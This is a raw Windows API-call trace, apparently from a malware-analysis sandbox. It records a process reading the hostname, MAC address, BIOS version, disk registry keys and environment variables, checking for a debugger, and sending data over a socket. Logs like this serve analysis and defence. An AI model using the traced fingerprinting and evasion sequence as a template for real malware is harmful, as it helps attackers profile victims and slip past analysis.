	[0113.469] GetLastError () returned 0x0
	[0113.469] SetLastError (dwErrCode=0x0) 
	[0113.469] GetLastError () returned 0x0
	[0113.469] SetLastError (dwErrCode=0x0) 
	[0113.469] GetLastError () returned 0x0
	[0113.469] SetLastError (dwErrCode=0x0) 
	[0113.469] GetLastError () returned 0x0
	[0113.469] SetLastError (dwErrCode=0x0) 
	[0113.469] wsprintfA (in: param_1=0x20aef4c, param_2="%02x:%02x:%02x:%02x:%02x:%02x" | out: param_1="00:00:00:00:00:00") returned 17
	[0113.469] GetLastError () returned 0x0
	[0113.469] SetLastError (dwErrCode=0x0) 
	[0113.469] GetLastError () returned 0x0
	[0113.470] SetLastError (dwErrCode=0x0) 
	[0113.470] GetLastError () returned 0x0
	[0113.470] SetLastError (dwErrCode=0x0) 
	[0113.470] GetLastError () returned 0x0
	[0113.470] SetLastError (dwErrCode=0x0) 
	[0113.470] GetLastError () returned 0x0
	[0113.470] SetLastError (dwErrCode=0x0) 
	[0113.470] GetLastError () returned 0x0
	[0113.470] SetLastError (dwErrCode=0x0) 
	[0113.470] GetLastError () returned 0x0
	[0113.470] SetLastError (dwErrCode=0x0) 
	[0113.470] GetLastError () returned 0x0
	[0113.470] SetLastError (dwErrCode=0x0) 
	[0113.470] GetLastError () returned 0x0
	[0113.471] SetLastError (dwErrCode=0x0) 
	[0113.471] GetLastError () returned 0x0
	[0113.471] SetLastError (dwErrCode=0x0) 
	[0113.471] GetLastError () returned 0x0
	[0113.471] SetLastError (dwErrCode=0x0) 
	[0113.471] GetLastError () returned 0x0
	[0113.471] SetLastError (dwErrCode=0x0) 
	[0113.471] GetLastError () returned 0x0
	[0113.471] SetLastError (dwErrCode=0x0) 
	[0113.471] GetLastError () returned 0x0
	[0113.471] SetLastError (dwErrCode=0x0) 
	[0113.471] GetLastError () returned 0x0
	[0113.472] SetLastError (dwErrCode=0x0) 
	[0113.472] GetLastError () returned 0x0
	[0113.472] SetLastError (dwErrCode=0x0) 
	[0113.472] GetLastError () returned 0x0
	[0113.472] SetLastError (dwErrCode=0x0) 
	[0113.472] GetLastError () returned 0x0
	[0113.472] SetLastError (dwErrCode=0x0) 
	[0113.472] GetLastError () returned 0x0
	[0113.472] SetLastError (dwErrCode=0x0) 
	[0113.473] SetLastError (dwErrCode=0x0) 
	[0113.473] GetEnvironmentVariableW (in: lpName="TEMP", lpBuffer=0x209ef6c, nSize=0x7fff | out: lpBuffer="C:\\Users\\Nd9E1FYi\\AppData\\Local\\Temp") returned 0x24
	[0113.473] gethostname (in: name=0x20aef64, namelen=257 | out: name="x2vS1cum") returned 0
	[0113.474] RegCreateKeyExW (in: hKey=0x80000002, lpSubKey="HARDWARE\\DESCRIPTION\\System", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x20019, lpSecurityAttributes=0x0, phkResult=0x26d720c, lpdwDisposition=0x0 | out: phkResult=0x26d720c*=0xb80, lpdwDisposition=0x0) returned 0x0
	[0113.474] RegQueryValueExW (in: hKey=0xb80, lpValueName="SystemBiosVersion", lpReserved=0x0, lpType=0x20aefe4, lpData=0x0, lpcbData=0x20aefc0*=0x26d7200 | out: lpType=0x20aefe4*=0x7, lpData=0x0, lpcbData=0x20aefc0*=0xec) returned 0x0
	[0113.474] RegQueryValueExW (in: hKey=0xb80, lpValueName="SystemBiosVersion", lpReserved=0x0, lpType=0x20aefe4, lpData=0x51ce920, lpcbData=0x20aefc0*=0xec | out: lpType=0x20aefe4*=0x7, lpData=0x51ce920*, lpcbData=0x20aefc0*=0xec) returned 0x0
	[0113.474] ReleaseSemaphore (in: hSemaphore=0x408, lReleaseCount=1, lpPreviousCount=0x20aecd0 | out: lpPreviousCount=0x20aecd0) returned 1
	[0113.475] ReleaseSemaphore (in: hSemaphore=0x408, lReleaseCount=1, lpPreviousCount=0x20aecc8 | out: lpPreviousCount=0x20aecc8) returned 1
	[0113.476] ReleaseSemaphore (in: hSemaphore=0x408, lReleaseCount=1, lpPreviousCount=0x20aecd0 | out: lpPreviousCount=0x20aecd0) returned 1
	[0113.476] RegCreateKeyExW (in: hKey=0x80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Enum\\IDE", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x20019, lpSecurityAttributes=0x0, phkResult=0x26d714c, lpdwDisposition=0x0 | out: phkResult=0x26d714c*=0x0, lpdwDisposition=0x0) returned 0x5
	[0113.477] FormatMessageA (in: dwFlags=0x11ff, lpSource=0x0, dwMessageId=0x5, dwLanguageId=0x0, lpBuffer=0x20aef1c, nSize=0x100, Arguments=0x0 | out: lpBuffer="@om\x02Lqm\x02S\x8d\x01\x04äï\n\x02") returned 0x12
	[0113.477] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Enum\\IDE", ulOptions=0x0, samDesired=0x20019, phkResult=0x20aef58 | out: phkResult=0x20aef58*=0x0) returned 0x2
	[0113.477] GetLastError () returned 0x0
	[0113.477] RegCreateKeyExW (in: hKey=0x80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Enum\\SCSI", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x20019, lpSecurityAttributes=0x0, phkResult=0x26d718c, lpdwDisposition=0x0 | out: phkResult=0x26d718c*=0xb78, lpdwDisposition=0x0) returned 0x0
	[0113.478] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Enum\\SCSI", ulOptions=0x0, samDesired=0x20019, phkResult=0x20aef58 | out: phkResult=0x20aef58*=0xb84) returned 0x0
	[0113.478] RegQueryInfoKeyW (in: hKey=0xb84, lpClass=0x20aeaf4, lpcchClass=0x20aef50, lpReserved=0x0, lpcSubKeys=0x20aef5c, lpcbMaxSubKeyLen=0x20aef38, lpcbMaxClassLen=0x20aef3c, lpcValues=0x20aef7c, lpcbMaxValueNameLen=0x20aef48, lpcbMaxValueLen=0x20aef30, lpcbSecurityDescriptor=0x20aef34, lpftLastWriteTime=0x20aef40 | out: lpClass="", lpcchClass=0x20aef50, lpcSubKeys=0x20aef5c*=0x3, lpcbMaxSubKeyLen=0x20aef38, lpcbMaxClassLen=0x20aef3c, lpcValues=0x20aef7c*=0x0, lpcbMaxValueNameLen=0x20aef48, lpcbMaxValueLen=0x20aef30, lpcbSecurityDescriptor=0x20aef34, lpftLastWriteTime=0x20aef40) returned 0x0
	[0113.478] RegEnumKeyExW (in: hKey=0xb84, dwIndex=0x0, lpName=0x20aecfc, lpcchName=0x20aef4c, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x20aef40 | out: lpName="CdRom&Ven_LG&Prod_GTA0N", lpcchName=0x20aef4c, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x20aef40) returned 0x0
	[0113.478] RegEnumKeyExW (in: hKey=0xb84, dwIndex=0x1, lpName=0x20aecfc, lpcchName=0x20aef4c, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x20aef40 | out: lpName="CdRom&Ven_LiteOn&Prod_DS-8ABSH", lpcchName=0x20aef4c, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x20aef40) returned 0x0
	[0113.478] RegEnumKeyExW (in: hKey=0xb84, dwIndex=0x2, lpName=0x20aecfc, lpcchName=0x20aef4c, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x20aef40 | out: lpName="Disk&Ven_&Prod_WDBMYH5000ANC", lpcchName=0x20aef4c, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x20aef40) returned 0x0
	[0113.480] timeGetTime () returned 0x2fd7b
	[0113.481] SetLastError (dwErrCode=0x0) 
	[0113.481] SetLastError (dwErrCode=0x0) 
	[0113.481] WSASend (in: s=0xa24, lpBuffers=0x20aeb80*=((len=0x21, buf=0x51b65a8*)), dwBufferCount=0x1, lpNumberOfBytesSent=0x20aeae8, dwFlags=0x0, lpOverlapped=0x51cfa90, lpCompletionRoutine=0x0 | out: lpBuffers=0x20aeb80*=((len=0x21, buf=0x51b65a8*)), lpNumberOfBytesSent=0x20aeae8*=0x21, lpOverlapped=0x51cfa90) returned 0
	[0113.483] SetLastError (dwErrCode=0x0) 
	[0113.483] WSARecv (in: s=0xa24, lpBuffers=0x20afbd0, dwBufferCount=0x1, lpNumberOfBytesRecvd=0x20afbcc, lpFlags=0x20afbc8*=0x0, lpOverlapped=0x51b3344, lpCompletionRoutine=0x0 | out: lpBuffers=0x20afbd0*=((len=0x0, buf=0x44a7430)), lpNumberOfBytesRecvd=0x20afbcc*=0x0, lpFlags=0x20afbc8*=0x0, lpOverlapped=0x51b3344) returned -1
	[0113.483] GetLastError () returned 0x3e5
	[0113.483] GetQueuedCompletionStatusEx (in: CompletionPort=0x398, lpCompletionPortEntries=0x20af408, ulCount=0x80, ulNumEntriesRemoved=0x20af3fc, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x20af408, ulNumEntriesRemoved=0x20af3fc) returned 1
	[0113.483] QueryPerformanceCounter (in: lpPerformanceCount=0x20af3f0 | out: lpPerformanceCount=0x20af3f0*=1819599000000) returned 1
	[0113.483] QueryPerformanceCounter (in: lpPerformanceCount=0x20afc38 | out: lpPerformanceCount=0x20afc38*=1819599000000) returned 1
	[0113.484] GetModuleHandleExW (in: dwFlags=0x6, lpModuleName=0x40215fd, phModule=0x20aedd8 | out: phModule=0x20aedd8*=0x77960000) returned 1
	[0113.486] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77960000
	[0113.486] GetModuleFileNameW (in: hModule=0x77960000, lpFilename=0x20af264, nSize=0x104 | out: lpFilename="C:\\Windows\\SYSTEM32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")) returned 0x1d
	[0113.486] IsDebuggerPresent () returned 0
	[0113.486] GetProcessWindowStation () returned 0x84
	[0113.486] GetUserObjectInformationW (in: hObj=0x84, nIndex=1, pvInfo=0x20aeda4, nLength=0xc, lpnLengthNeeded=0x20aed90 | out: pvInfo=0x20aeda4, lpnLengthNeeded=0x20aed90) returned 1
	[0113.486] GetActiveWindow () returned 0x0
	[0113.486] MessageBoxW (hWnd=0x0, lpText="Assertion failed!\n\nProgram: C:\\Windows\\SYSTEM32\\ntdll.dll\nFile: src\\win\\timer.c\nLine: 37\n\nExpression: new_time >= loop->time\n\nFor information on how your program can cause an assertion\nfailure, see the Visual C++ documentation on asserts\n\n(Press Retry to debug the application - JIT must be enabled)", lpCaption="Microsoft Visual C++ Runtime Library", uType=0x12012) returned 5
	[0113.692] GetEnvironmentVariableW (in: lpName="debug_net", lpBuffer=0x209f7a4, nSize=0x7fff | out: lpBuffer="\x4695\x413\xf984\x20a\xfbc\x413\xf854\x209\xf924\x20a\xf924\x20a") returned 0x0
	[0113.692] GetLastError () returned 0xcb
	[0113.692] GetEnvironmentVariableW (in: lpName="debug_net", lpBuffer=0x209f7a4, nSize=0x7fff | out: lpBuffer="\x4695\x413\xf984\x20a\xfbc\x413\xf854\x209\xf924\x20a\xf924\x20a") returned 0x0
	[0113.692] GetLastError () returned 0xcb
	[0113.693] SetLastError (dwErrCode=0x0) 
	[0113.693] SetLastError (dwErrCode=0x0) 
	[0113.693] SetLastError (dwErrCode=0x0) 
	[0113.693] SetLastError (dwErrCode=0x0) 
	[0113.693] SetLastError (dwErrCode=0x0) 
	[0113.693] SetLastError (dwErrCode=0x0) 
	[0113.693] WSASend (in: s=0xa24, lpBuffers=0x20af538*=((len=0x332, buf=0x51b65a8*)), dwBufferCount=0x1, lpNumberOfBytesSent=0x20af4a0, dwFlags=0x0, lpOverlapped=0x51cfa90, lpCompletionRoutine=0x0 | out: lpBuffers=0x20af538*=((len=0x332, buf=0x51b65a8*)), lpNumberOfBytesSent=0x20af4a0*=0x332, lpOverlapped=0x51cfa90) returned 0
	[0113.694] SetLastError (dwErrCode=0x0) 
	[0113.694] SetLastError (dwErrCode=0x0) 
	[0113.694] GetLastError () returned 0x0
	[0113.694] SetLastError (dwErrCode=0x0) 
	[0113.694] GetLastError () returned 0x0
	[0113.695] SetLastError (dwErrCode=0x0) 
	[0113.695] SetLastError (dwErrCode=0x0) 
	[0113.695] SetLastError (dwErrCode=0x0) 
	[0113.695] GetLastError () returned 0x0
	[0113.695] SetLastError (dwErrCode=0x0) 
	[0113.695] GetLastError () returned 0x0
	[0113.695] SetLastError (dwErrCode=0x0) 
	[0113.695] GetQueuedCompletionStatusEx (in: CompletionPort=0x398, lpCompletionPortEntries=0x20af408, ulCount=0x80, ulNumEntriesRemoved=0x20af3fc, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x20af408, ulNumEntriesRemoved=0x20af3fc) returned 0
	[0113.695] GetLastError () returned 0x102
	[0113.695] QueryPerformanceCounter (in: lpPerformanceCount=0x20afc38 | out: lpPerformanceCount=0x20afc38*=1819620200000) returned 1
	[0113.696] GetModuleHandleExW (in: dwFlags=0x6, lpModuleName=0x40215fd, phModule=0x20aedd8 | out: phModule=0x20aedd8*=0x77960000) returned 1
	[0113.696] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77960000
	[0113.696] GetModuleFileNameW (in: hModule=0x77960000, lpFilename=0x20af264, nSize=0x104 | out: lpFilename="C:\\Windows\\SYSTEM32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")) returned 0x1d
	[0113.696] IsDebuggerPresent () returned 0
	[0113.696] GetProcessWindowStation () returned 0x84
	[0113.697] GetUserObjectInformationW (in: hObj=0x84, nIndex=1, pvInfo=0x20aeda4, nLength=0xc, lpnLengthNeeded=0x20aed90 | out: pvInfo=0x20aeda4, lpnLengthNeeded=0x20aed90) returned 1
	[0113.697] GetActiveWindow () returned 0x0
	[0113.697] MessageBoxW (hWnd=0x0, lpText="Assertion failed!\n\nProgram: C:\\Windows\\SYSTEM32\\ntdll.dll\nFile: src\\win\\timer.c\nLine: 37\n\nExpression: new_time >= loop->time\n\nFor information on how your program can cause an assertion\nfailure, see the Visual C++ documentation on asserts\n\n(Press Retry to debug the application - JIT must be enabled)", lpCaption="Microsoft Visual C++ Runtime Library", uType=0x12012) returned 5
	[0114.047] GetEnvironmentVariableW (in: lpName="debug_net", lpBuffer=0x209f7a4, nSize=0x7fff | out: lpBuffer="\x4695\x413\xf984\x20a\xfbc\x413\xf854\x209\xf924\x20a\xf924\x20a") returned 0x0
	[0114.047] GetLastError () returned 0xcb
	[0114.047] GetEnvironmentVariableW (in: lpName="debug_net", lpBuffer=0x209f7a4, nSize=0x7fff | out: lpBuffer="\x4695\x413\xf984\x20a\xfbc\x413\xf854\x209\xf924\x20a\xf924\x20a") returned 0x0
	[0114.047] GetLastError () returned 0xcb
	[0114.048] GetQueuedCompletionStatusEx (in: CompletionPort=0x398, lpCompletionPortEntries=0x20af408, ulCount=0x80, ulNumEntriesRemoved=0x20af3fc, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x20af408, ulNumEntriesRemoved=0x20af3fc) returned 1
	[0114.048] QueryPerformanceCounter (in: lpPerformanceCount=0x20af3f0 | out: lpPerformanceCount=0x20af3f0*=1819655500000) returned 1
	[0114.048] QueryPerformanceCounter (in: lpPerformanceCount=0x20afc38 | out: lpPerformanceCount=0x20afc38*=1819655500000) returned 1
	[0114.048] GetModuleHandleExW (in: dwFlags=0x6, lpModuleName=0x40215fd, phModule=0x20aedd8 | out: phModule=0x20aedd8*=0x77960000) returned 1
	[0114.049] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77960000
	[0114.049] GetModuleFileNameW (in: hModule=0x77960000, lpFilename=0x20af264, nSize=0x104 | out: lpFilename="C:\\Windows\\SYSTEM32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")) returned 0x1d
	[0114.049] IsDebuggerPresent () returned 0
	[0114.049] GetProcessWindowStation () returned 0x84
	[0114.050] GetUserObjectInformationW (in: hObj=0x84, nIndex=1, pvInfo=0x20aeda4, nLength=0xc, lpnLengthNeeded=0x20aed90 | out: pvInfo=0x20aeda4, lpnLengthNeeded=0x20aed90) returned 1
	[0114.051] GetActiveWindow () returned 0x0
	[0114.051] MessageBoxW (hWnd=0x0, lpText="Assertion failed!\n\nProgram: C:\\Windows\\SYSTEM32\\ntdll.dll\nFile: src\\win\\timer.c\nLine: 37\n\nExpression: new_time >= loop->time\n\nFor information on how your program can cause an assertion\nfailure, see the Visual C++ documentation on asserts\n\n(Press Retry to debug the application - JIT must be enabled)", lpCaption="Microsoft Visual C++ Runtime Library", uType=0x12012) returned 5
	[0114.280] SCardEstablishContext (in: dwScope=0x0, pvReserved1=0x0, pvReserved2=0x0, phContext=0x44a6b04 | out: phContext=0x44a6b04) returned -2146435043
	[0114.408] WSARecv (in: s=0xa24, lpBuffers=0x20afbf8, dwBufferCount=0x1, lpNumberOfBytesRecvd=0x20afbf0, lpFlags=0x20afbf4*=0x0, lpOverlapped=0x0, lpCompletionRoutine=0x0 | out: lpBuffers=0x20afbf8*=((len=0x1000, buf=0x26430a0*)), lpNumberOfBytesRecvd=0x20afbf0*=0x1000, lpFlags=0x20afbf4*=0x0, lpOverlapped=0x0) returned 0
	[0114.408] SetLastError (dwErrCode=0x0) 
	[0114.408] SetLastError (dwErrCode=0x0) 
	[0114.408] SetLastError (dwErrCode=0x0) 
	[0114.408] GetEnvironmentVariableW (in: lpName="debug_net", lpBuffer=0x209f414, nSize=0x7fff | out: lpBuffer="\xfbc\x413\xf4bc\x209\xf57c\x20a\xf57c\x20a") returned 0x0
	[0114.408] GetLastError () returned 0xcb
	[0114.408] GetEnvironmentVariableW (in: lpName="debug_net", lpBuffer=0x209f414, nSize=0x7fff | out: lpBuffer="\xfbc\x413\xf4bc\x209\xf57c\x20a\xf57c\x20a") returned 0x0
	[0114.408] GetLastError () returned 0xcb
	[0114.409] GetEnvironmentVariableW (in: lpName="debug_main", lpBuffer=0x209f2fc, nSize=0x7fff | out: lpBuffer="\xdd09\x1760\x2b00\x52\x2b0e\x413\x2b04\x52\xff54\x412\xf4a4\x20a\xf504\x20a\xf368\x209\x04") returned 0x0
	[0114.409] GetLastError () returned 0xcb
	[0114.409] GetEnvironmentVariableW (in: lpName="debug_net", lpBuffer=0x209f354, nSize=0x7fff | out: lpBuffer="") returned 0x0
	[0114.409] GetLastError () returned 0xcb
	[0114.410] SetLastError (dwErrCode=0x0) 
	[0114.410] SetLastError (dwErrCode=0x0) 
	[0114.410] SetLastError (dwErrCode=0x0) 
	[0114.410] GetEnvironmentVariableW (in: lpName="debug_net", lpBuffer=0x209f414, nSize=0x7fff | out: lpBuffer="\xfbc\x413\xf4bc\x209\xf57c\x20a\xf57c\x20a") returned 0x0
	[0114.410] GetLastError () returned 0xcb
	[0114.410] GetEnvironmentVariableW (in: lpName="debug_net", lpBuffer=0x209f414, nSize=0x7fff | out: lpBuffer="\xfbc\x413\xf4bc\x209\xf57c\x20a\xf57c\x20a") returned 0x0
	[0114.410] GetLastError () returned 0xcb
	[0114.410] GetEnvironmentVariableW (in: lpName="debug_main", lpBuffer=0x209f2fc, nSize=0x7fff | out: lpBuffer="\xdd09\x1760\x2b2c\x52\x2b0e\x413\x2b30\x52\xff54\x412\xf4a4\x20a\xf504\x20a\xf368\x209\x04") returned 0x0
	[0114.410] GetLastError () returned 0xcb
	[0114.411] GetEnvironmentVariableW (in: lpName="debug_net", lpBuffer=0x209f354, nSize=0x7fff | out: lpBuffer="") returned 0x0
	[0114.411] GetLastError () returned 0xcb
	[0114.411] SetLastError (dwErrCode=0x0) 
	[0114.411] SetLastError (dwErrCode=0x0) 
	[0114.411] SetLastError (dwErrCode=0x0) 
	[0114.411] GetEnvironmentVariableW (in: lpName="debug_net", lpBuffer=0x209f414, nSize=0x7fff | out: lpBuffer="\xfbc\x413\xf4bc\x209\xf57c\x20a\xf57c\x20a") returned 0x0
	[0114.411] GetLastError () returned 0xcb
	[0114.411] GetEnvironmentVariableW (in: lpName="debug_net", lpBuffer=0x209f414, nSize=0x7fff | out: lpBuffer="\xfbc\x413\xf4bc\x209\xf57c\x20a\xf57c\x20a") returned 0x0
	[0114.411] GetLastError () returned 0xcb
	[0114.412] GetEnvironmentVariableW (in: lpName="debug_main", lpBuffer=0x209f2fc, nSize=0x7fff | out: lpBuffer="\xdd09\x1760\x2b58\x52\x2b0e\x413\x2b5c\x52\xff54\x412\xf4a4\x20a\xf504\x20a\xf368\x209\x04") returned 0x0
	[0114.412] GetLastError () returned 0xcb
	[0114.412] GetEnvironmentVariableW (in: lpName="debug_net", lpBuffer=0x209f354, nSize=0x7fff | out: lpBuffer="") returned 0x0
	[0114.412] GetLastError () returned 0xcb
	[0114.412] SetLastError (dwErrCode=0x0) 
	[0114.412] SetLastError (dwErrCode=0x0) 
	[0114.412] SetLastError (dwErrCode=0x0) 
	[0114.412] GetEnvironmentVariableW (in: lpName="debug_net", lpBuffer=0x209f414, nSize=0x7fff | out: lpBuffer="\xfbc\x413\xf4bc\x209\xf57c\x20a\xf57c\x20a") returned 0x0
	[0114.412] GetLastError () returned 0xcb
	[0114.412] GetEnvironmentVariableW (in: lpName="debug_net", lpBuffer=0x209f414, nSize=0x7fff | out: lpBuffer="\xfbc\x413\xf4bc\x209\xf57c\x20a\xf57c\x20a") returned 0x0
	[0114.416] GetLastError () returned 0xcb
	[0114.417] GetEnvironmentVariableW (in: lpName="debug_main", lpBuffer=0x209f2fc, nSize=0x7fff | out: lpBuffer="\xdd09\x1760\x2b84\x52\x2b0e\x413\x2b88\x52\xff54\x412\xf4a4\x20a\xf504\x20a\xf368\x209\x04") returned 0x0
	[0114.417] GetLastError () returned 0xcb
	[0114.417] timeGetTime () returned 0x30125
	[0114.417] GetEnvironmentVariableW (in: lpName="debug_main", lpBuffer=0x209f144, nSize=0x7fff | out: lpBuffer="") returned 0x0
	[0114.417] GetLastError () returned 0xcb
	[0114.418] timeGetTime () returned 0x30125
	[0114.418] SetLastError (dwErrCode=0x0) 
	[0114.418] SetLastError (dwErrCode=0x0) 
	[0114.418] WSASend (in: s=0xa24, lpBuffers=0x20aec60*=((len=0x21, buf=0x51b65a8*)), dwBufferCount=0x1, lpNumberOfBytesSent=0x20aebc8, dwFlags=0x0, lpOverlapped=0x51cfa90, lpCompletionRoutine=0x0 | out: lpBuffers=0x20aec60*=((len=0x21, buf=0x51b65a8*)), lpNumberOfBytesSent=0x20aebc8*=0x21, lpOverlapped=0x51cfa90) returned 0
	[0114.419] GetEnvironmentVariableW (in: lpName="debug_net", lpBuffer=0x209f354, nSize=0x7fff | out: lpBuffer="") returned 0x0
	[0114.419] GetLastError () returned 0xcb
	[0114.420] SetLastError (dwErrCode=0x0) 
	[0114.420] SetLastError (dwErrCode=0x0) 
	[0114.420] SetLastError (dwErrCode=0x0) 
	[0114.420] GetEnvironmentVariableW (in: lpName="debug_net", lpBuffer=0x209f414, nSize=0x7fff | out: lpBuffer="\xfbc\x413\xf4bc\x209\xf57c\x20a\xf57c\x20a") returned 0x0
	[0114.420] GetLastError () returned 0xcb
	[0114.420] GetEnvironmentVariableW (in: lpName="debug_net", lpBuffer=0x209f414, nSize=0x7fff | out: lpBuffer="\xfbc\x413\xf4bc\x209\xf57c\x20a\xf57c\x20a") returned 0x0
	[0114.420] GetLastError () returned 0xcb
	[0114.420] GetEnvironmentVariableW (in: lpName="debug_main", lpBuffer=0x209f2fc, nSize=0x7fff | out: lpBuffer="\xdd09\x1760\x2bb0\x52\x2b0e\x413\x2bb4\x52\xff54\x412\xf4a4\x20a\xf504\x20a\xf368\x209\x04") returned 0x0
	[0114.420] GetLastError () returned 0xcb
	[0114.421] GetEnvironmentVariableW (in: lpName="debug_net", lpBuffer=0x209f354, nSize=0x7fff | out: lpBuffer="") returned 0x0
	[0114.421] GetLastError () returned 0xcb
	[0114.421] SetLastError (dwErrCode=0x0) 
	[0114.421] SetLastError (dwErrCode=0x0) 
	[0114.421] SetLastError (dwErrCode=0x0) 
	[0114.421] GetEnvironmentVariableW (in: lpName="debug_net", lpBuffer=0x209f414, nSize=0x7fff | out: lpBuffer="\xfbc\x413\xf4bc\x209\xf57c\x20a\xf57c\x20a") returned 0x0
	[0114.421] GetLastError () returned 0xcb
	[0114.421] GetEnvironmentVariableW (in: lpName="debug_net", lpBuffer=0x209f414, nSize=0x7fff | out: lpBuffer="\xfbc\x413\xf4bc\x209\xf57c\x20a\xf57c\x20a") returned 0x0
	[0114.421] GetLastError () returned 0xcb
	[0114.421] GetEnvironmentVariableW (in: lpName="debug_main", lpBuffer=0x209f2fc, nSize=0x7fff | out: lpBuffer="\xdd09\x1760\x2bdc\x52\x2b0e\x413\x2be0\x52\xff54\x412\xf4a4\x20a\xf504\x20a\xf368\x209\x04") returned 0x0
	[0114.421] GetLastError () returned 0xcb
	[0114.422] GetEnvironmentVariableW (in: lpName="debug_net", lpBuffer=0x209f354, nSize=0x7fff | out: lpBuffer="") returned 0x0
	[0114.422] GetLastError () returned 0xcb
	[0114.422] SetLastError (dwErrCode=0x0) 
	[0114.422] SetLastError (dwErrCode=0x0) 
	[0114.422] SetLastError (dwErrCode=0x0) 
	[0114.422] GetEnvironmentVariableW (in: lpName="debug_net", lpBuffer=0x209f414, nSize=0x7fff | out: lpBuffer="\xfbc\x413\xf4bc\x209\xf57c\x20a\xf57c\x20a") returned 0x0
	[0114.422] GetLastError () returned 0xcb
	[0114.422] GetEnvironmentVariableW (in: lpName="debug_net", lpBuffer=0x209f414, nSize=0x7fff | out: lpBuffer="\xfbc\x413\xf4bc\x209\xf57c\x20a\xf57c\x20a") returned 0x0
	[0114.422] GetLastError () returned 0xcb
	[0114.422] GetEnvironmentVariableW (in: lpName="debug_main", lpBuffer=0x209f2fc, nSize=0x7fff | out: lpBuffer="\xdd09\x1760\x2c08\x52\x2b0e\x413\x2c0c\x52\xff54\x412\xf4a4\x20a\xf504\x20a\xf368\x209\x04") returned 0x0
	[0114.422] GetLastError () returned 0xcb
	[0114.423] GetEnvironmentVariableW (in: lpName="debug_net", lpBuffer=0x209f354, nSize=0x7fff | out: lpBuffer="") returned 0x0
	[0114.423] GetLastError () returned 0xcb
	[0114.423] SetLastError (dwErrCode=0x0) 
	[0114.423] SetLastError (dwErrCode=0x0) 
	[0114.423] SetLastError (dwErrCode=0x0) 
	[0114.423] GetEnvironmentVariableW (in: lpName="debug_net", lpBuffer=0x209f414, nSize=0x7fff | out: lpBuffer="\xfbc\x413\xf4bc\x209\xf57c\x20a\xf57c\x20a") returned 0x0
	[0114.423] GetLastError () returned 0xcb
	[0114.423] GetEnvironmentVariableW (in: lpName="debug_net", lpBuffer=0x209f414, nSize=0x7fff | out: lpBuffer="\xfbc\x413\xf4bc\x209\xf57c\x20a\xf57c\x20a") returned 0x0
	[0114.423] GetLastError () returned 0xcb
	[0114.423] GetEnvironmentVariableW (in: lpName="debug_main", lpBuffer=0x209f2fc, nSize=0x7fff | out: lpBuffer="\xdd09\x1760\x2c34\x52\x2b0e\x413\x2c38\x52\xff54\x412\xf4a4\x20a\xf504\x20a\xf368\x209\x04") returned 0x0
	[0114.423] GetLastError () returned 0xcb
	[0114.424] timeGetTime () returned 0x3012b
	[0114.424] GetEnvironmentVariableW (in: lpName="debug_main", lpBuffer=0x209f144, nSize=0x7fff | out: lpBuffer="") returned 0x0
	[0114.424] GetLastError () returned 0xcb
	[0114.424] GetVersionExW (in: lpVersionInformation=0x20af00c*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x37c, dwMinorVersion=0x26e4958, dwBuildNumber=0x20af054, dwPlatformId=0x37c, szCSDVersion="\xe0fd\x414\x37c") | out: lpVersionInformation=0x20af00c*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x2, dwBuildNumber=0x23f0, dwPlatformId=0x2, szCSDVersion="")) returned 1
	[0114.424] wsprintfA (in: param_1=0x20aef0c, param_2="%d.%d.%d" | out: param_1="6.2.9200") returned 8
	[0114.425] GetNativeSystemInfo (in: lpSystemInfo=0x20af0e8 | out: lpSystemInfo=0x20af0e8*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x4f01)) 
	[0114.425] RegQueryValueExW (in: hKey=0x80000004, lpValueName="2", lpReserved=0x0, lpType=0x0, lpData=0x20ae118, lpcbData=0x20ae108*=0x1000 | out: lpType=0x0, lpData=0x20ae118*=0x50, lpcbData=0x20ae108*=0x3e0) returned 0x0
	[0114.431] GetLastError () returned 0x0
	[0114.432] SetLastError (dwErrCode=0x0) 
	[0114.432] GetLastError () returned 0x0
	[0114.432] SetLastError (dwErrCode=0x0) 
	[0114.432] GetEnvironmentVariableW (in: lpName="HOMEPATH", lpBuffer=0x209f04c, nSize=0x7fff | out: lpBuffer="\\Users\\Nd9E1FYi") returned 0xf
	[0114.432] GetEnvironmentVariableW (in: lpName="COMPUTERNAME", lpBuffer=0x209f04c, nSize=0x7fff | out: lpBuffer="X2VS1CUM") returned 0x8
	[0114.432] GetEnvironmentVariableW (in: lpName="SystemDrive", lpBuffer=0x209f04c, nSize=0x7fff | out: lpBuffer="C:") returned 0x2
	[0114.433] GetEnvironmentVariableW (in: lpName="SystemRoot", lpBuffer=0x209f04c, nSize=0x7fff | out: lpBuffer="C:\\Windows") returned 0xa
	[0114.433] GetEnvironmentVariableW (in: lpName="USERDOMAIN", lpBuffer=0x209f04c, nSize=0x7fff | out: lpBuffer="X2VS1CUM") returned 0x8
